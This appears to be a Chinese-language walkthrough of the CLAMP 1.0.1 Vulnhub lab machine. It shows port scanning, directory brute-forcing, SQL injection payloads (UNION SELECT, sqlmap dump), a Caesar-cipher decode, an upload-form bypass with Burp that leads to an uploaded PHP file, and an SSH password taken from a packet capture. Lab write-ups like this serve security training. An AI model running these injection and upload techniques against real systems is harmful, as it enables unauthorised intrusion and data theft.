CLAMP 1.0.1 Vulnhub Walkthrough

 

主机层面端口扫描探测:

╰─ nmap -p1-65535 -A -sV 10.10.202.137

CLAMP 1.0.1 Vulnhub Walkthrough_第1张图片

访问web服务 

CLAMP 1.0.1 Vulnhub Walkthrough_第2张图片

使用dirbuster 加大字段进行目录爆破

CLAMP 1.0.1 Vulnhub Walkthrough_第3张图片

http://10.10.202.137/nt4stopc/index.php

CLAMP 1.0.1 Vulnhub Walkthrough_第4张图片

 

看看这些问题先:

 

Question

True/False Bit

Baku is the capital of Turkey? 巴库是土耳其的首都

False

0

The beginning of the French revolution is 1798. 法国革命的时间

True

1

Istanbul was conquered in 1435? 伊斯坦布尔于1435年被征服?

True 1
Fatih Sultan Mehmet is the founder of the Ottoman Empire? Fatih Sultan Mehmet是奥斯曼帝国的创始人 False

0

The founder of robot science is Al-Cezeri? 机器人科学的创始人是Al-Cezeri

True 1
Dennis Ritchie, who developed the C language? Dennis Ritchie,他开发了C语言 True

1

The function definition belongs to the C89 standard? 功能定义属于C89标准

True 1

The other element of the array is 1?数组的另一个元素是1

False

0

Is the maximum 32-but value 2,147,482646? 最大32位值是2,147,482646 False

0

Is there an undefined behaviour in the following code? 以下代码中是否存在未定义的行为 True

1

 

 

 

 

 

 二进制:0110111001

http://10.10.202.137/nt4stopc/0110111001

稍等跳转到:
http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/

CLAMP 1.0.1 Vulnhub Walkthrough_第5张图片

右键源码:

CLAMP 1.0.1 Vulnhub Walkthrough_第6张图片

 

访问尝试下注入:

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3

CLAMP 1.0.1 Vulnhub Walkthrough_第7张图片

 

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 and 1=1 #true

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 and 1=2 #false 

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3 order by 5--+

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=-3 +UNION+ALL+SELECT+1,2,3,4,5--+

CLAMP 1.0.1 Vulnhub Walkthrough_第8张图片

 

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=-3 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+

CLAMP 1.0.1 Vulnhub Walkthrough_第9张图片

 

我们直接用SQLmap搞一波吧,手工真麻烦

CLAMP 1.0.1 Vulnhub Walkthrough_第10张图片

╰─ sqlmap -u "http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/go.php?id=3" --dbs --batch -D tatil -T gereksiz -C gereksiz --dump

CLAMP 1.0.1 Vulnhub Walkthrough_第11张图片

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf 应该是一种加密过的字符串,我们尝试Google解密下

https://cryptii.com/pipes/caesar-cipher

CLAMP 1.0.1 Vulnhub Walkthrough_第12张图片

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

CLAMP 1.0.1 Vulnhub Walkthrough_第13张图片

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php

CLAMP 1.0.1 Vulnhub Walkthrough_第14张图片

卧槽没有提交按钮,是不是隐藏掉了?

这里使用burp抓包修改

CLAMP 1.0.1 Vulnhub Walkthrough_第15张图片

CLAMP 1.0.1 Vulnhub Walkthrough_第16张图片

http://10.10.202.137/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/af73b4a487065af10015796aa6293880.php

CLAMP 1.0.1 Vulnhub Walkthrough_第17张图片

 

进行提权操作:

http://10.10.202.137/important.pcapng

CLAMP 1.0.1 Vulnhub Walkthrough_第18张图片

 

email=mkelepce&message=Hello+there,+The+password+for+the+SSH+account+you+want+is:+mkelepce:mklpc-osas112.+If+you+encounter+a+problem,+just+mail+it.++Good+work

password:mklpc-osas112.

CLAMP 1.0.1 Vulnhub Walkthrough_第19张图片

 完! 

你可能感兴趣的:(CLAMP 1.0.1 Vulnhub Walkthrough)